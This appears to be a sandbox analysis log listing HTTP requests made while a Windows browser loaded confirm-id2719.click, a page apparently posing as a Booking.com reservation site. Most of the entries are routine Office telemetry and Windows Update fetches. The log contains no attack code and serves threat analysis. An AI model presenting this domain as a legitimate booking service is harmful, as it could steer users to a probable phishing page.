        Source: global trafficHTTP traffic detected: GET /Reservation_files/319302672.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1host: code.jquery.comorigin: https://confirm-id2719.clicksec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
        Source: global trafficHTTP traffic detected: GET /Reservation_files/protect.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /static/favicon.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1host: partner.booking.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://confirm-id2719.clicksec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: manifestreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VRr5F+7gkvM5Kss&MD=Oh6bxDDd HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Source: global trafficHTTP traffic detected: GET /antifraud HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
